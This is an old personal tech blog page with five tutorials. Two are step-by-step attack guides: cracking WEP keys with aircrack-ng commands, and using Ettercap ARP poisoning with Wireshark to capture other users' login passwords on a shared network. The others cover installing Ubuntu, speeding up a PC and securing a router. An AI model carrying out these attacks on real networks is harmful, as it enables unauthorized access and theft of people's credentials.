Log in or sign up


USER:
PASS:

Welcome To Jcortesweb.com

 
 
Wireless WEP Key Hacking - Linux
This tutorial shows how to crack a WEP key using aircrack-ng suite
Security Flaws With Using WEP Video & Tutorial
NOTE: This tutorial shows how easy it is to hack a WEP secured network it should not be replicated without the permission of the networks owner.
  • log in as root
  • Start the network device all devices are different so i cant walk you through it.
  • Put the device in monitor mode and start it with airmon-ng
  • monitor the channel and even the bssid of the target network until you find a connection to a station
  • Take note of the stations MAC address and the BSSID
  • set up the arpreplay command below but do not hit enter.
    • aireplay-ng --arpreplay -b [BSSID of the network] -h [Connected clients MAC address] [Interface]
  • Next we preform a fake authentication with the network to speed up the ARP replies.
    • aireplay-ng -1 0 -a [BSSID of the network] -h [Connected clients MAC address] -e [ESSID or Network Name] [Interface]
  • Hit enter on the fake authentication window then right away switch to the arpreplay window and press enter as well. If need be use Ctrl + C to repeat this process many times. It can take up to 15 mins for the ARP replies to come in. After which point you should try to authenticate again.
  • Once the ARP replies start to come in open a new tab and log them with airodump-ng
    • airodump-ng -c [Channel] --bssid [BSSID of the network] -w [Capture file name] rausb0
  • Wait for the Data to reach 80,000-100,000 then begin the actual cracking process.
    • aircrack-ng -z {This starts the PTW attack which is much faster} [Capture file name]


Posted by admin on Wednesday 19 March 2008 -12:39:32 AM | Comments: 1  |  email to someone printer friendly create pdf of this news item
 
 
 
 
 
Packet Sniffing With Ettercap
This tutorial shows how to use ettercap to sniff passwords and other information off of a network.
Using Ettercap To Sniff Out Passwords On A Network

In response to multiple requests for LAN and wired hacks i have explained this tutorial in more detail.
In case you don't know what Ettercap is i will explain. Ettercap is a network security tool that allows you to preform many different types of attacks on a network. The one i cover in this tutorial is a MITM (Man-In-The-Middle) attack. This attack sends all data, or packets, from the router through my device and back out to the requesting machine. With that being preformed i can use programs like Ettercap and Wireshark to sniff the information.ATTENTION WINDOWS USERS!!!!! For those users who do not have Linux and want to do this on windows. Ettercap is available in a unofficial binary package at the following link. If the link is broken please leave a comment to inform me. Wireshark is also available below. Ettercap:
http://sourceforge.net/project/showfiles.php?group_id=17435&...

Wireshark: http://www.wireshark.org/download.html NOTE: Myspace passwords and most email sites do not get picked up by ettercap you will have to search in wireshark for the packet containing the word password. I will explain in more detail how to do it later in the tutorial. POP email passwords and Youtube accounts are the only ones that i have tried that get picked up directly by Ettercap.

1. Connect To The Network - In my case i use the ralink drivers so i use RutilT Wireless Lan Manager

etter2


2. Verify You Are Connected Completely - Assure that you have an IP address with the network then proceed to the next step.

etter3



3. Start Ettercap From The Terminal - If Ettercap is installed correctly all you need to do is type in "ettercap -G" to launch the GUI version of Ettercap

4. Set The Netmask - Go to Options > Set Netmask. Most of the time this is set to 255.255.255.0 but always make sure to double check.


etter5



etter6

5. Start Unified Sniffing - Click Sniff > Unified Sniffing. Next select the network interface you will be sniffing on.





 etter7

6. Scan For Hosts - Click Hosts > Scan For Hosts. Sometimes this requires that it be done more than once in order to find every device.

7. Start Sniffing - Click Start > Start Sniffing.

 etter8

8. Start The Man-in-the-middle Attack - Click MITM > ARP Poisoning. Check the "sniff remote connections" box and click ok.


 etter9

9. Start Wireshark And Click The Interface Icon - Once you have started wireshark click on the interface icon to setup your device.


 etter10

10. Start Sniffing - Click Start next to your network device that has been configured to ettercap. This will capture almost every packet that comes through the device in case ettercap does not sniff the password. For example Myspace passwords to not get picked up by ettercap but can be found in packets captured by wireshark.


 etter11


11. Wait For A Login - Wait till someone decides to log into a site like myspace, youtube, or gmail then stop the capture.
12. Click the Find Packet Button - Select the String radio button and search for the word password.


 etter12
13. Read The Password - Review the packet closley and you will see the username and password. Also check ettercap as it picks up usernames and passwords in a more orderly fashion.

Posted by admin on Wednesday 19 March 2008 -12:35:42 AM | Comments: 5  |  email to someone printer friendly create pdf of this news item
 
 
 
 
 
Linux Ubuntu Install Guide
This tutorial shows how to install Ubuntu Linux along side windows.
Ubuntu Linux Install Guide
ubuntu_logo

Question: Why would i want Ubuntu Linux?
Answer: Can Windows Vista or Mac Do This?


Part A: Installing Linux
1. Fist thing you need to do is download the ubuntu .iso file and burn it to a cd see the FAQ for more info on burning an iso images to a cd.
2. Once you have downloaded and burned the image boot from the CD see the FAQ for how to boot from a CD.

3. Select "Start Or Install Ubuntu"
lin1

lin2

4. Ubuntu will load, though it is slow this is due to the fact it is running from the cd drive and not from the hard drive when the actual install is complete it will run much faster
5. Click on the install icon on the desktop







6. Answer the questions accurately. Now the partition tool will load



7. You will come to the main page now



8. You should be given three choices. The first option is for users who want to set up a dual-boot of both windows and Ubuntu. Ubuntu will help shrink the Windows partition and create a new one.



9. The second option is for if you want to have nothing but Ubuntu for your operating system.





10. The third option is for those advanced users who know how to partition the drive.



11. you can also chose to import settings from users in windows xp and other operating systems. I usually skip this step but it is a matter of what you would like to do. Note: it does not import information from vista.

12. Next you will be asked to create user information fill it in as necessary


13. Now we begin the installation process. Click install and let linux do its thing.
14. Depending on your computer, this could take some time.






15. When you reach this screen Ubuntu has been installed simply restart and boot to ubuntu

Part B: Installing Beryl (The Program that makes Ubuntu look cool)

1. First before anything we need to make sure that desktop effects are enabled this will prevent us from having errors later on and making linux useless.

2. Go to System > Administration > Restricted Driver Manager. If any of your video drivers are in this box like mine where you will need to enable them to proceed to the next step. This may require a restart before you can activate the next part.

3. Next go to System > Preferences > Desktop Effects and make sure they are enabled with both boxes checked.Now we install beryl

4. Open a terminal Applications > Accessories > Terminal

5. Type the following one line at a time. cd /usr/local/bin
wget http://distfiles.gentoo-xeffects.org/beryl-setup
chmod 755 beryl-setup
beryl-setup --setup
Once beryl is installed you will want to download the beryl manager so you can configure the settings and get it started.

6. Go to System > Administration > Synaptic Package Manager

7. Search for Beryl-Manager, right click it and mark for installation. Then press apply and let the program install.

8. You can now officially use beryl. Go to Applications > System Tools > Beryl Manager this will start beryl and you will see the diamond appear at the top right. Right click it and select Beryl Settings Manager to configure it to your liking.

9. We finally Have Everything Up And Running. Enjoy!

Posted by admin on Wednesday 19 March 2008 -12:53:27 AM | Comments: 1  |  email to someone printer friendly create pdf of this news item
 
 
 
 
 
Jcortes's Guide to a Fast PC
This tutorial shows how to optimize your computer to run as fast as possible.
Jcortes’s Guide to a Fast PC

1. Virus Removal


Desctiption
:
Removes programs that will damage your computer or steal info. Perform a virus scan in safe mode (See Safe mode Instructions At the bottom of this guide) using existing Anti-Virus Software on the computer. If there are no Anti-Viruses on the system purchase one or try some free online scans.

Free Anti-Virus Programs:


- AVG Anti-Virus
- Avast Anti-Virus
- Panda Anti-Virus

Commercial Anti-Virus Programs:


- NOD32
- Norton Anti-Virus - McAfee Anti-Virus
- Zone Alarm Anti-Virus
- Kaspersky Anti-Virus (recommended) Online Scans (Most Require Internet Explorer)

- http://housecall.trendmicro.com/
- http://www3.ca.com/virusinfo/virusscan.aspx
- http://www.bitdefender.com/scan/license.php
-
http://us.mcafee.com/root/mfs/default.asp

2. Spyware Removal
- Spyware Programs

Description:
Removes programs that could harm or slow down your computer. Download the top 2 spyware programs listed below and run them in safe mode. Once the scan is done restart the system

Spyware
Removal Programs (Search www.download.com):
- Ad Aware Se personal
-
Spybot Search & Destroy
-
Ewido

- Hijackthis Log
Description: Creates advanced log of services running. Download HijackThis from www.download.com.

NOTE:
this does not need to be done in Safe Mode

1. Open up the HijackThis Program
2. Click on SCAN at the bottom.
3. Once it's finished click on Save Log and save it as a .txt file. DO NOT FIX ANYTHING!!
4. Submit the Log as a comment to this post


3. General Speed Increases
- MSCONFIG

Description: This will increase startup speed. Start > run> type msconfig > click the Startup Tab > click Disable All then recheck your firewall and anti-virus. For example anything under the command category that has to do with the location of your anti-virus or firewall should be checked again (EX: Zone Alarm is zlclient) - CCleaner Description: Deletes Junk files and temporary files Download CCleaner from www.download.com and install it. Run the program and click Run Cleaner this will clear files that are not needed by the computer and free up a lot of space. - Registry Fixing Description: Fixes problems in the system registry Run CCleaner and click the Issues button on the side > Click Scan For Issues > when it finishes scanning click Fix Selected Issues > select No for backing up the registry > then click Fix All Selected Issues > Ok > and Close.

- Defragment

Description:
Reorganizes files on the hard drive to make the computer faster.

1. Open My Computer.
2. Right-click the local disk volume that you want to defragment, and then click Properties.
3. On the Tools tab, click Defragment Now.
4. Click Defragment.

*
Also download Diskeeper it does a much better job for defragmenting.

And your done you should have a much faster and safer

PC
SAFEMODE INSTRUCTIONS
1.
Make sure you have the latest version of the virus definitions
2.
Turn off the computer (Start > Shut Down)
3.
Press the power button. At the first screen you see press F8 repeatedly until you hear a beep or you get to a black screen with options on it.
4.
Select Safe Mode from the list
5. The PC will begin to load main system files. Answer Yes or Ok to any questions it may ask you.
6.
It will now start up in a basic looking windows interface with only the core system files active.

Posted by admin on Wednesday 19 March 2008 -12:52:19 AM | Comments: 3  |  email to someone printer friendly create pdf of this news item
 
 
 
 
 
Securing Your Router
This tutorial shows how to secure your router to defend against attacks shown on this site.
Securing your router to keep your data safe.
Most of my tutorials are telling you how to exploit flaws in wireless security so i figured i would make a tutorial on how to protect yourself. Below is a list of things you can do to your router to make it more secure. In case you have never edited settings on your router before you will need to do the following. Click Start > Run > Type "cmd" and enter > type "ipconfig" and enter > Find your Default Gateway and take note of it. Linksys users is usually 192.168.1.1 Netgear is usually 192.168.2.1 and so on.

ipconfig

Next you will need to go into your web browser and type the Default Gateway into the address bar. After you navigate to the page it will prompt you for a username and password.

routerlogin
If you have never logged into the router before the default password should be in place. Try the following default passwords untill you are able to log into the routers interface.

Username: admin
Password: admin

Username: admin
Password: *No Password*

Username: *No Username*
Password: *No Password*

Username: admin
Password: password

For a list of usernames and passwords by router maker follow the link below:
From this poing forward it is hard to walk you through because every router is different. I suggest downloading the routers userguide from the manufactures site. I will just list the things you should do.

NOTE: First thing you will want to do if you have a router that has no type of authentication go to the wireless security settings and at least enable WEP. This makes it so that anyone who wants to use your network has to have the key that you set in place. WEP is not the flawless but its better than nothing. I also suggest looking at alternate security measures listed below..

Secure with WPA or WPA2:
using this method of security it is harder for some one to hack into your network. As demonstrated in my hacking tutorials WEP security is very easy to crack. With WPA you can not crack the key at any given time you have to wait for an initial connection from a computer on that network. A hacker can not just infiltrate the network at anytime like wep.

Disable SSID Broadcasting:
This prevents the name of your network from broadcasting for every one to see. Also avoid naming your network anything that is related to you like a family name.

Enable MAC filtering:
this makes sure that only the computers you specify are able to connect. Though this is still easy to crack used along side WPA it will be much safer.

Change The Default Administrative Password:
Always make sure you change the password for the router settings.


Posted by admin on Wednesday 19 March 2008 -12:50:50 AM | Comments: 1  |  email to someone printer friendly create pdf of this news item
 
 
 
Go to page       >>